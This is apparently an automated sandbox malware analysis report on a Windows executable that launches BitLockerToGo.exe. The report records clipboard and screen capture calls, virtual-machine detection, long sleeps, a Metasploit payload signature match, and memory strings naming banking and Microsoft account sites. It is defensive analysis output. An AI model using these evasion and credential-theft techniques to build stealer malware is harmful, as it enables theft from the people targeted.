              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0025E4A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_0025E4A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0025E4A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_0025E4A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0025E680 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,3_2_0025E680

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.2208741125.000000C000374000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0024E8803_2_0024E880
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_002519103_2_00251910
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00245C003_2_00245C00
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00234C503_2_00234C50
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0024662A3_2_0024662A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00250FBC3_2_00250FBC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_002310723_2_00231072
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_002338503_2_00233850
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_002520523_2_00252052
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_002381303_2_00238130
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_002531423_2_00253142
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_002699C03_2_002699C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0026B2703_2_0026B270
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_002342403_2_00234240
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00236A403_2_00236A40
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0026FACD3_2_0026FACD
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0023F3003_2_0023F300
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0024DBEE3_2_0024DBEE
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00259BC73_2_00259BC7
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00255BD03_2_00255BD0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_002364703_2_00236470
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00252C9D3_2_00252C9D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00269CE03_2_00269CE0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00262CC03_2_00262CC0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0025AD4D3_2_0025AD4D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0026B5C03_2_0026B5C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00231E203_2_00231E20
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00254E6B3_2_00254E6B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0024FFB03_2_0024FFB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00265F903_2_00265F90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_002537FE3_2_002537FE
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 00239280 appears 122 times
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 00238B80 appears 43 times
              Source: 6xmBUtHylU.exeStatic PE information: Number of sections : 12 > 10
              Source: 6xmBUtHylU.exe, 00000000.00000003.2193938229.00000245F7550000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs 6xmBUtHylU.exe
              Source: 6xmBUtHylU.exe, 00000000.00000003.2195259181.000000C0004DA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs 6xmBUtHylU.exe
              Source: 6xmBUtHylU.exe, 00000000.00000000.2101657583.00007FF67F84F000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBlancco File.exeDVarFileInfo$ vs 6xmBUtHylU.exe
              Source: 6xmBUtHylU.exe, 00000000.00000003.2193969767.00000245F7510000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs 6xmBUtHylU.exe
              Source: 6xmBUtHylU.exeBinary or memory string: OriginalFilenameBlancco File.exeDVarFileInfo$ vs 6xmBUtHylU.exe
              Source: 00000000.00000002.2208741125.000000C000374000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@1/1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0025E089 CoCreateInstance,3_2_0025E089
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeFile created: C:\Users\Public\Libraries\fbnae.scifJump to behavior
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeFile opened: C:\Windows\system32\60b6415a5f0d74930314eeeb7aec7b0bfe16859cc1a40da63a927021322150daAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
              Source: 6xmBUtHylU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 6xmBUtHylU.exeReversingLabs: Detection: 42%
              Source: 6xmBUtHylU.exeVirustotal: Detection: 30%
              Source: 6xmBUtHylU.exeString found in binary or memory: etlfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntim
              Source: 6xmBUtHylU.exeString found in binary or memory: etlfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntim
              Source: 6xmBUtHylU.exeString found in binary or memory: sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stoppin
              Source: 6xmBUtHylU.exeString found in binary or memory: sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stoppin
              Source: 6xmBUtHylU.exeString found in binary or memory: failed to construct HKDF label: %sinvalid nested repetition operatorinvalid or unsupported Perl syntaxcrypto/rc4: invalid buffer overlapGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizereflect.MakeSlice of non-slice typecrypto/md5: invalid hash state size2006-01-02T15:04:05.999999999Z07:00SubscribeServiceChangeNotificationsCOFF symbols count is absurdly highnot a PE file, smaller than tiny PE` SizeOfRawData is larger than filenetwork dropped connection on resettransport endpoint is not connected1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=file type does not support deadlinex509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesssuperfluous leading zeros in lengthexecutable file not found in %PATH%ber2der: BER tag length is negativehttps://management.chinacloudapi.cnCONTINUATION frame with stream ID 0too many Questions to pack (>65535)transform: short destination buffer'_' must separate successive digitsbigmod: modulus is smaller than natunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKmime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largeflate: corrupt input before offset P224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitychacha20: output smaller than inputcrypto/cipher: input not full blocksmethod ABI and value ABI don't alignTime.UnmarshalBinary: invalid lengthstrings.Builder.Grow: negative countstrings: Join output length overflowThunk Address Of Data too spread outPower PC with floating point supportaccessing a corrupted shared library444089209850062616169452667236328125ryuFtoaFixed64 called with prec > 180123456789abcdefghijklmnopqrstuvwxyzbytes.Reader.ReadAt: negative offsetlfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
              Source: 6xmBUtHylU.exeString found in binary or memory: failed to construct HKDF label: %sinvalid nested repetition operatorinvalid or unsupported Perl syntaxcrypto/rc4: invalid buffer overlapGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizereflect.MakeSlice of non-slice typecrypto/md5: invalid hash state size2006-01-02T15:04:05.999999999Z07:00SubscribeServiceChangeNotificationsCOFF symbols count is absurdly highnot a PE file, smaller than tiny PE` SizeOfRawData is larger than filenetwork dropped connection on resettransport endpoint is not connected1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=file type does not support deadlinex509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesssuperfluous leading zeros in lengthexecutable file not found in %PATH%ber2der: BER tag length is negativehttps://management.chinacloudapi.cnCONTINUATION frame with stream ID 0too many Questions to pack (>65535)transform: short destination buffer'_' must separate successive digitsbigmod: modulus is smaller than natunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKmime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largeflate: corrupt input before offset P224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitychacha20: output smaller than inputcrypto/cipher: input not full blocksmethod ABI and value ABI don't alignTime.UnmarshalBinary: invalid lengthstrings.Builder.Grow: negative countstrings: Join output length overflowThunk Address Of Data too spread outPower PC with floating point supportaccessing a corrupted shared library444089209850062616169452667236328125ryuFtoaFixed64 called with prec > 180123456789abcdefghijklmnopqrstuvwxyzbytes.Reader.ReadAt: negative offsetlfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
              Source: 6xmBUtHylU.exeString found in binary or memory: net/addrselect.go
              Source: 6xmBUtHylU.exeString found in binary or memory: github.com/saferwall/pe@v1.4.8/loadconfig.go
              Source: unknownProcess created: C:\Users\user\Desktop\6xmBUtHylU.exe "C:\Users\user\Desktop\6xmBUtHylU.exe"
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: 6xmBUtHylU.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: 6xmBUtHylU.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: 6xmBUtHylU.exeStatic file information: File size 6814720 > 1048576
              Source: 6xmBUtHylU.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x277000
              Source: 6xmBUtHylU.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x349800
              Source: 6xmBUtHylU.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb source: 6xmBUtHylU.exe, 00000000.00000003.2193938229.00000245F7550000.00000004.00001000.00020000.00000000.sdmp, 6xmBUtHylU.exe, 00000000.00000003.2195259181.000000C0004DA000.00000004.00001000.00020000.00000000.sdmp, 6xmBUtHylU.exe, 00000000.00000003.2193969767.00000245F7510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL source: 6xmBUtHylU.exe, 00000000.00000003.2193938229.00000245F7550000.00000004.00001000.00020000.00000000.sdmp, 6xmBUtHylU.exe, 00000000.00000003.2195259181.000000C0004DA000.00000004.00001000.00020000.00000000.sdmp, 6xmBUtHylU.exe, 00000000.00000003.2193969767.00000245F7510000.00000004.00001000.00020000.00000000.sdmp
              Source: 6xmBUtHylU.exeStatic PE information: section name: .xdata
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0027016A push edx; ret 3_2_00270171
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5820Thread sleep time: -180000s >= -30000sJump to behavior
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: BitLockerToGo.exe, 00000003.00000003.2290216843.0000000002831000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2227392089.0000000002831000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2217427604.0000000002831000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2328165604.00000000027E8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2328165604.0000000002831000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2238156888.0000000002831000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2265630337.0000000002831000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2250362177.0000000002831000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: 6xmBUtHylU.exe, 00000000.00000002.2209285482.00000245B1FC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
